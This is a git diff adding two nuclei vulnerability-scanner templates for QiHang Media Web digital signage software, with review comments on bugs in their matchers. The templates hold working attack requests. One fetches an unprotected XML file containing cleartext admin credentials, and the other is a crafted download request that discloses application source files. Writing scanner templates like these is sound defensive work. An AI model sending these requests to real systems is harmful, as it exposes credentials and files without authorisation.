diff --git a/vulnerabilities/other/qihang-media-disclosure.yaml b/vulnerabilities/other/qihang-media-disclosure.yaml
new file mode 100644
index 0000000000..4bc2973454
--- /dev/null
+++ b/vulnerabilities/other/qihang-media-disclosure.yaml
@@ -0,0 +1,23 @@
+id: qihang-media-disclosure
+
+info:
+ name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
+ author: gy741
+ severity: critical
+ description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
+ reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
+ tags: qihang,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/xml/User/User.xml"
+
+ matchers:
+ - type: word
+ words:
+ - ""
+ - "account="
+ - "password="
+ condition: and
diff --git a/vulnerabilities/other/qihang-media-lfi.yaml b/vulnerabilities/other/qihang-media-lfi.yaml
new file mode 100644
index 0000000000..a4bcd43d65
--- /dev/null
+++ b/vulnerabilities/other/qihang-media-lfi.yaml
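Review bot: The third entry under `words:` in the disclosure template is an empty string, `- ""`, which every response body contains, so it contributes nothing to the `and` condition and the template fires on any page that merely mentions `account=` and `password=` (a login form's inline script, for example), with no status check to exclude error pages that echo the request. The hunk header announces 23 added lines but only 22 are recoverable on this page, so the empty value may be an XML tag (the file's root element, or its `<?xml` prolog) that the rendering stripped; confirm against the committed file before merging. Either way, replace the empty word with a token that only User.xml carries, and gate the match on a 200 response as below.
```yaml
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "account="
          - "password="
        condition: and
      - type: status
        status:
          - 200
```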
@@ -0,0 +1,35 @@
+id: qihang-media-lfi
+
+info:
+ name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
+ author: gy741
+ severity: high
+ description: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
+ reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
+ tags: qihang,lfi
+
+requests:
+ - raw:
+ - |
+ GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "filename=QH.aspx"
+ - "application/zip"
+ part: header
+ condition: and
+
+ - type: word
+ regex:
+ - "QH.aspx.cs"
+ - "QiHang.Media.Web.QH"
+ condition: and
+
+ - type: status
+ status:
+ - 200
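Review bot: The second matcher of the LFI template is declared `type: word` but lists its patterns under `regex:` rather than `words:`; in the nuclei releases I am aware of a word matcher reads only `words:`, so this matcher has nothing to match and, combined with `matchers-condition: and`, the template should never report a hit (newer versions may instead reject it at validation). Both values are plain strings, so the one-line fix is to rename the key to `words:`; if a regex was intended, change the type to `type: regex` and escape the dots, e.g. `"QH\\.aspx\\.cs"`, since an unescaped `.` matches any byte. Separately, the first matcher requires `application/zip`, so these strings are being searched inside an archive body; that only works when the entry is stored uncompressed or the string is part of an entry name, which is worth verifying against a captured response before relying on it.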